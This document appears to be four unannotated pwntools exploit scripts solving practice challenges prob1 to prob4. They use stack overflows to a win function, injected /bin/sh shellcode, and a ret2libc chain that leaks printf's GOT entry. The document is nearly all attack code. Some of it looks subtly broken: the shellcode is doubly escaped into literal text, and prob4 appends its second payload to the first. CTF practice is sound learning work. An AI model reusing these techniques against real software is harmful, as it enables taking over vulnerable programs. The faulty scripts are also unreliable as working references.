prob1

from pwn import *

context.log_level = 'debug'
r = process("./prob1")
e = ELF("./prob1")
win = e.symbols['win']

r.recvuntil(":")

pay = "A" * 0x24
pay += "A" * 4
pay += p32(win)
r.sendline(pay)

r.interactive()

prob2

from pwn import *

context.log_level = 'debug'
r = process("./prob2")
e = ELF("./prob2")

win = e.symbols['win']
r.recvuntil(":")

pay = 'A' * (0x14 + 0x4)
pay += p32(win)

r.sendline(pay)
r.interactive()

prob3

from pwn import *

context.log_level = 'debug'
r = process("./prob3")
e = ELF("./prob3")

shellcode = "\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x89\\xc2\\xb0\\x0b\\xcd\\x80"

r.recvuntil(":")
r.recvuntil('0x')
buf = int(r.recv(8), 16)

pay = shellcode
pay += 'A'*(0x88 + 0x4 - len(shellcode))
pay += p32(buf)

r.sendline(pay)
r.interactive()

prob4

from pwn import *

context.log_level = 'debug'
r = process("./prob4")
e = ELF("./prob4")
libc = e.libc

r.recvuntil(":")

printf_got = e.got['printf']
printf_plt = e.plt['printf']
main = e.symbols['main']

ppr = p32(0x08048598)

pay = "A" * 0x88
pay += "A" * 4
pay += p32(printf_plt) + ppr + p32(printf_got) + p32(main) + p32(main)

r.sendline(pay)
libc_base = u32(r.recvuntil('\\xf7')[-4:]) - libc.symbols['printf']
print hex(libc_base)

system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search("/bin/sh").next()

r.recvuntil(':')
pay += p32(system) + ppr + p32(binsh)
r.sendline(pay)

r.interactive()